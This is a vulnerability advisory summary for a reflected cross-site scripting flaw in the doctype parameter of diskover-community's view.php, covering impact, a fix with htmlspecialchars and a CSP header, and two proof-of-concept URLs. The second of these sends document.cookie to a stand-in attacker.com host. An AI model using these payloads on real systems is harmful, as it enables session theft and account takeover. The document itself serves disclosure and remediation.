# CVE-2026-38935 Vulnerability Summary ## Vulnerability Overview - **Vulnerability Type**: Reflected Cross-Site Scripting (Reflected XSS) - **Affected Component**: `public/view.php` in `diskover-community` - **Vulnerable Parameter**: `doctype` parameter - **Vulnerability Description**: - The user-supplied `doctype` parameter is not filtered or escaped and is directly concatenated into the `href` attribute of an HTML `` tag. - Attackers can craft malicious links; when a victim clicks the link, the malicious JavaScript code will execute in the victim's browser. ## Impact Scope - **Affected Versions**: `diskover-community` versions less than or equal to 2.3.5. - **Impact Scope**: - Affects all authenticated users, including administrators. - Contains 8 independent injection points. - Can lead to PHP Session Hijacking, allowing attackers to steal the victim's `PHPSESSID` and take over the account. - Can be combined with CVE-2026-38934 (CSRF) to achieve automated account takeover. ## Remediation 1. **Code Fix**: In `public/view.php`, apply HTML entity encoding to all instances of `$_REQUEST['doctype']` within `echo` statements. ```php // Sanitize all echo points echo htmlspecialchars($_REQUEST['doctype'], ENT_QUOTES, 'UTF-8'); ``` 2. **Security Policy**: Add a Content Security Policy (CSP) header to restrict script sources: ``` Content-Security-Policy: default-src 'self' ``` ## Proof of Concept (POC) **1. Session Hijacking** ```html http://TARGET/view.php?id=test&file=&index=diskover-test&doctype=">alert(document.cookie) ``` **2. Silent Cookie Exfiltration** ```html http://TARGET/view.php?id=test&file=&index=diskover-test&doctype=">fetch('https://attacker.com/steal?c='+document.cookie) ```